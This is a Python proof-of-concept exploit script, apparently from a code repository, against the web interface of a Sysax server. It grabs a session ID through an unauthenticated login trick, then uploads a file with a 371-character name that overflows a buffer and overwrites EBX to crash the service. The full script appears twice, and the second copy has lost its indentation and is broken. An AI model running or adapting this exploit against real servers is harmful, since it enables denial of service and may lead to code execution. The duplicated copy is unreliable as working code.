hosakauk/sysax_crash.py

## sysax_crash.py
import requests
from bs4 import BeautifulSoup
import sys

host = sys.argv[1]
URL = "http://"+host+"/scgi?sid=0&pid=dologin"
head = {"Referer" : "http://"+host+"/scgi?pid=0&action=dologin"}
# no auth login
payload = {"fd":"Cg=="}

junk = "E"*10000

def getsid():
    r = requests.post(URL, headers=head, data=payload)
    # fudge to get valid SID
    rt = r.text
    soup = BeautifulSoup(rt,"lxml")
    nsid = soup.a
    bsid = nsid.get('href')
    bsid = bsid[9:49]
    return bsid

def docrash():
    crash = "A"*367 # buffer to crash
    crash += "C"*4 # overwrites next 4 bytes of EBX
    file = {"foo":"bar"}
    files = {"file":(crash,junk, "application/octet-stream", {'Expires':'0'})}
    formURL = "http://"+host+"/scgi?sid="+getsid()+"&pid=uploadfile_name1.htm"
    rf = requests.post(formURL, headers=head, files=files)
    print(rf.text)

if __name__ == "__main__":
    docrash()
	import requests
	from bs4 import BeautifulSoup
	import sys

	host = sys.argv[1]
	URL = "http://"+host+"/scgi?sid=0&pid=dologin"
	head = {"Referer" : "http://"+host+"/scgi?pid=0&action=dologin"}
	# no auth login
	payload = {"fd":"Cg=="}

	junk = "E"*10000

	def getsid():
	r = requests.post(URL, headers=head, data=payload)
	# fudge to get valid SID
	rt = r.text
	soup = BeautifulSoup(rt,"lxml")
	nsid = soup.a
	bsid = nsid.get('href')
	bsid = bsid[9:49]
	return bsid

	def docrash():
	crash = "A"*367 # buffer to crash
	crash += "C"*4 # overwrites next 4 bytes of EBX
	file = {"foo":"bar"}
	files = {"file":(crash,junk, "application/octet-stream", {'Expires':'0'})}
	formURL = "http://"+host+"/scgi?sid="+getsid()+"&pid=uploadfile_name1.htm"
	rf = requests.post(formURL, headers=head, files=files)
	print(rf.text)

	if __name__ == "__main__":
	docrash()